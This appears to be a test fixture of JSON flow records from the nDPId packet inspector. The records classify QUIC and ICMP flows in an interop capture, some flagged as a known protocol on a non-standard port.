+00726{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434507,"flow_last_seen":1603816434657,"flow_idle_time":180000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":2464,"flow_avg_l4_payload_len":1232,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2400:8902::f03c:91ff:fe69:a454","src_port":38077,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}}
+00873{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434670,"flow_last_seen":1603816434802,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1259,"flow_avg_l4_payload_len":629,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:4800:7817:101:be76:4eff:fe04:631d","src_port":49788,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}}
+00839{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1603816434542,"flow_last_seen":1603816444513,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":10016,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"3.121.242.54","src_port":60784,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC.AmazonAWS","breed":"Acceptable","category":"Cloud"}}
+00827{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434643,"flow_last_seen":1603816434794,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":2504,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"71.202.41.169","src_port":50289,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}}
+00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1603816434569,"flow_last_seen":1603816444507,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":10016,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"131.159.24.198","src_port":34511,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}}
+00652{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":74,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434855,"flow_last_seen":1603816434997,"flow_idle_time":120000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"40.112.191.60","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}}
+00836{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434584,"flow_last_seen":1603816434709,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1283,"flow_avg_l4_payload_len":641,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"18.189.84.245","src_port":43475,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC.AmazonAWS","breed":"Acceptable","category":"Cloud"}}
+00827{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1603816434640,"flow_last_seen":1603816434640,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"51.158.105.98","src_port":45250,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}}
+00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":73,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1603816434822,"flow_last_seen":1603816434822,"flow_idle_time":120000,"flow_min_l4_payload_len":1240,"flow_max_l4_payload_len":1240,"flow_tot_l4_payload_len":1240,"flow_avg_l4_payload_len":1240,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2604:a880:800:a1::1279:3001","dst_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}}
+00828{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1603816434664,"flow_last_seen":1603816444508,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":10016,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"193.190.10.98","src_port":59515,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}}
+00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1603816434628,"flow_last_seen":1603816435041,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":2558,"flow_avg_l4_payload_len":639,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"202.238.220.92","src_port":38933,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}}
+00862{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434628,"flow_last_seen":1603816434722,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1279,"flow_avg_l4_payload_len":639,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2604:a880:800:a1::1279:3001","src_port":51040,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}}
+00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1603816434601,"flow_last_seen":1603816435020,"flow_idle_time":180000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":2542,"flow_avg_l4_payload_len":635,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"140.227.52.92","src_port":37784,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}}
+00654{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1603816434530,"flow_last_seen":1603816434530,"flow_idle_time":120000,"flow_min_l4_payload_len":556,"flow_max_l4_payload_len":556,"flow_tot_l4_payload_len":556,"flow_avg_l4_payload_len":556,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"3.121.242.54","dst_ip":"192.168.1.128","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}}
+00716{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434659,"flow_last_seen":1603816434682,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1259,"flow_avg_l4_payload_len":629,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2606:4700:10::6816:826","src_port":46353,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}}
+00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":67,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1603816434766,"flow_last_seen":1603816435089,"flow_idle_time":120000,"flow_min_l4_payload_len":91,"flow_max_l4_payload_len":1240,"flow_tot_l4_payload_len":2662,"flow_avg_l4_payload_len":665,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2400:8902::f03c:91ff:fe69:a454","dst_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}}
+00873{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434586,"flow_last_seen":1603816434622,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1259,"flow_avg_l4_payload_len":629,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2a05:d018:ce9:8100:cd2a:e2fd:b3be:c5ab","src_port":39945,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}}
+00714{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":60,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1603816434736,"flow_last_seen":1603816434736,"flow_idle_time":180000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:19f0:4:34::1","src_port":43645,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}}
+00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":56,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1603816434721,"flow_last_seen":1603816435054,"flow_idle_time":180000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":2590,"flow_avg_l4_payload_len":647,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"138.91.188.147","src_port":39975,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Azure","breed":"Acceptable","category":"Cloud"}}
+00731{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434507,"flow_last_seen":1603816434548,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1259,"flow_avg_l4_payload_len":629,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2a05:d018:ce9:8100:cd2a:e2fd:b3be:c5ab","src_port":37876,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}}
+00852{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434590,"flow_last_seen":1603816434688,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1259,"flow_avg_l4_payload_len":629,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:19f0:4:34::1","src_port":35643,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}}
+00872{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434628,"flow_last_seen":1603816434677,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1267,"flow_avg_l4_payload_len":633,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2a00:ac00:4000:400:2e0:4cff:fe68:199d","src_port":52271,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}}
+00825{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1603816434684,"flow_last_seen":1603816435089,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":2558,"flow_avg_l4_payload_len":639,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"202.238.220.92","src_port":35263,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}}
+00869{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434652,"flow_last_seen":1603816434749,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1259,"flow_avg_l4_payload_len":629,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:19f0:5:c21:5400:1ff:fe33:3b96","src_port":45852,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}}
+00865{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":55,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1603816434707,"flow_last_seen":1603816435089,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":2534,"flow_avg_l4_payload_len":633,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2400:8902::f03c:91ff:fe69:a454","src_port":44924,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}}
+00731{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1603816434586,"flow_last_seen":1603816434586,"flow_idle_time":180000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:19f0:5:c21:5400:1ff:fe33:3b96","src_port":39624,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}}
+00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1603816434641,"flow_last_seen":1603816435089,"flow_idle_time":180000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":2542,"flow_avg_l4_payload_len":635,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"133.242.206.244","src_port":42456,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}}
+00827{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":69,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1603816434776,"flow_last_seen":1603816434776,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"51.158.105.98","src_port":43735,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}}
+00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1603816434512,"flow_last_seen":1603816434512,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"3.121.242.54","src_port":47010,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.AmazonAWS","breed":"Acceptable","category":"Cloud"}}
+00657{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":75,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1603816434886,"flow_last_seen":1603816435111,"flow_idle_time":120000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":556,"flow_tot_l4_payload_len":1222,"flow_avg_l4_payload_len":305,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"133.242.206.244","dst_ip":"192.168.1.128","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}}
+00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1603816434606,"flow_last_seen":1603816444569,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":10016,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"193.190.10.98","src_port":49658,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}}
+00714{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434519,"flow_last_seen":1603816434551,"flow_idle_time":180000,"flow_min_l4_payload_len":23,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1255,"flow_avg_l4_payload_len":627,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:bc8:47a4:1c25::1","src_port":60346,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}}
+00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1603816434582,"flow_last_seen":1603816434582,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"51.158.105.98","src_port":51887,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}}
+00837{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":62,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1603816434743,"flow_last_seen":1603816444721,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":10016,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"138.91.188.147","src_port":42468,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC.Azure","breed":"Acceptable","category":"Cloud"}}
+00837{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":57,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1603816434721,"flow_last_seen":1603816444586,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":10016,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"138.91.188.147","src_port":50705,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC.Azure","breed":"Acceptable","category":"Cloud"}}
+00839{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":64,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1603816434756,"flow_last_seen":1603816444721,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":10016,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"3.121.242.54","src_port":53402,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC.AmazonAWS","breed":"Acceptable","category":"Cloud"}}
